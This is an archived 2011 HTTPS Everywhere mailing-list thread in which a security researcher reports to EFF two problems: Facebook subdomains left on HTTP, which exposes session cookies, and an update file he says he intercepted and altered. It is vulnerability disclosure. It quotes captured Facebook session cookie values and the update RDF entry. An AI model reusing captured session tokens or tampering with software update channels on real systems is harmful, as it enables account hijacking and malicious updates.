[HTTPS-Everywhere] Fwd: URGENT! BROKEN SSL MitM Vulnerability for HTTPS Everywhere --- RE: HTTPS Everywhere doesn't cover all Facebook sub domains
Rebecca S. Reagan
rsreagan at eff.org
Fri May 6 09:05:00 PDT 2011
Rebecca S. Reagan
Intake Coordinator
Electronic Frontier Foundation
(415)436-9333 Ext. 135
Become a Member! https://www.eff.org/support
-------- Original Message --------
Subject: URGENT! BROKEN SSL MitM Vulnerability for HTTPS Everywhere ---
RE: HTTPS Everywhere doesn't cover all Facebook sub domains
Date: Fri, 6 May 2011 14:42:26 +0000
From: Decime, Jerry (IT Security) <jerry.decime at hp.com>
To: Rebecca Reagan <rsreagan at eff.org>
Rebecca,
In addition to the ongoing issues with HTTPS Everywhere not actually
providing protection when visiting Facebook, it recently performed an
update for which I was able to get into the middle and push my own code
(to my own environment) rather than the actual update code from
www.eff.org. This was possible because it made an update request here:
https://www.eff.org/files/https-everywhere-update.rdf
It was then possible to modify the code location and signature:
<RDF:Description RDF:about="rdf:#$ybGCJ1"
NS1:id="{ec8030f7-c20a-464f-9b0e-13a3a9e97384}" NS1:minVersion="3.5"
NS1:maxVersion="4.*"
NS1:updateLink="https://www.eff.org/files/https-everywhere-0.9.6.xpi"
NS1:updateHash="sha1:31f800d2b1d15e994cdea0fbf0fdd72cf50c03b5"/>
This was possible because www.eff.org <http://www.eff.org> is STILL
USING the non secure SSLv2 protocol:
https://www.eff.org/files/https-everywhere-update.rdf
PLEASE! Remove SSLv2 support & get this fixed ASAP!
Thanks,
Jerry Decime
Senior Security Strategist
Hewlett-Packard
*From:* Rebecca Reagan [mailto:rsreagan at eff.org]
*Sent:* Tuesday, November 16, 2010 5:30 PM
*To:* Decime, Jerry (IT Security)
*Subject:* Re: HTTPS Everywhere doesn't cover all Facebook sub domains
Dear Jerry,
Thank you for sending us follow up information. Our technologists are
aware of the methods you're describing and are considering various ways
to address the problems.
Again, thank you,
Rebecca S. Reagan
On 11/16/10 3:35 PM, Decime, Jerry (IT Security) wrote:
Release version 0.2.2. Also note that I’ve found that third-parties to
Facebook sometime fail to protect Facebook OAuth credentials with HTTPS
so the picture starts to look a bit bleak when it comes to locking down
the entire Facebook experience. Unfortunately it really does come down
to architecting applications correctly to begin with.
BTW, it’s really easy to test this plug-in by simply having all HTTP
traffic traverse The Fiddler2 & then watch and inspect any HTTP traffic
you might see. Optionally, you can also write a Fiddler2 rule to alert
you if it finds a pre-defined chunk of text. This is helpful for
automatically finding matches on session info and OAuth tokens.
Let me know if you need additional information or help.
Thanks,
Jerry Decime
Senior Security Strategist
Hewlett-Packard
*From:* Rebecca Reagan [mailto:rsreagan at eff.org]
*Sent:* Tuesday, November 16, 2010 4:29 PM
*To:* Decime, Jerry (IT Security)
*Subject:* Re: HTTPS Everywhere doesn't cover all Facebook sub domains
Dear Jerry,
Thank you for contacting the Electronic Frontier Foundation (EFF) with
your concerns. Do you know if you are using the release version of the
software, or the more aggressive development version? That would be
helpful information for us. We are working to close the gaps and
appreciate information of this nature.
Should you be interested in more information on HTTPS Everywhere, please
see the FAQ at http://www.eff.org/https-everywhere/faq or consider
joining the HTTPS Everywhere mailing list
https://falcon.eff.org/mailman/listinfo/https-everywhere.
Again, thank you for your conscientious work and for sharing the
information with us.
Yours,
Rebecca S. Reagan
Intake Coordinator
On 11/16/10 12:43 PM, Decime, Jerry (IT Security) wrote:
Attached is an HTTP capture using “The Fiddler2” which shows that your
HTTPS Everywhere plug-in for Firefox clearly does not guard against the
capture of session keys on Facebook since it doesn’t enforce HTTPS for
all sub domains containing sensitive session information. In the capture
file please reference requests for:
_http://apps.facebook.com_
_http://static.ak.connect.facebook.com _
_http://pixel.facebook.com _
I confirmed that the cookies available via these sub domains include
Facebook session information which could be used to authenticate a
session as the user:
From www.facebook.com <http://www.facebook.com> which is over HTTPS and
protected -> Cookie:
datr=1254513682-574ca117e8bd2a567f4b89716f2001469c25bf54e2afd8912cd3d;
lu=gg7I-qcyMqBuXz_2ipSNt3bg; c_user=100000117904896; sct=1288715876;
sid=5; xs=5051d732d54e78705c9075aef52d8eaa; locale=en_US
From apps.facebook.com which is over HTTP and not protected & confirms
the possibility of session hijack -> Cookie:
datr=1254513682-574ca117e8bd2a567f4b89716f2001469c25bf54e2afd8912cd3d;
lu=gg7I-qcyMqBuXz_2ipSNt3bg; c_user=100000117904896; sct=1288715876;
sid=5; xs=5051d732d54e78705c9075aef52d8eaa; locale=en_US
I downloaded the plug-in today, just before testing & installed it in a
browser which has never had the plug-in installed (using Firefox
3.6.12). It enforces HTTPS elsewhere on Facebook, but not all sub
domains as shown in the attached capture.
Thanks,
Jerry Decime
Senior Security Strategist
Hewlett-Packard
More information about the HTTPS-everywhere
mailing list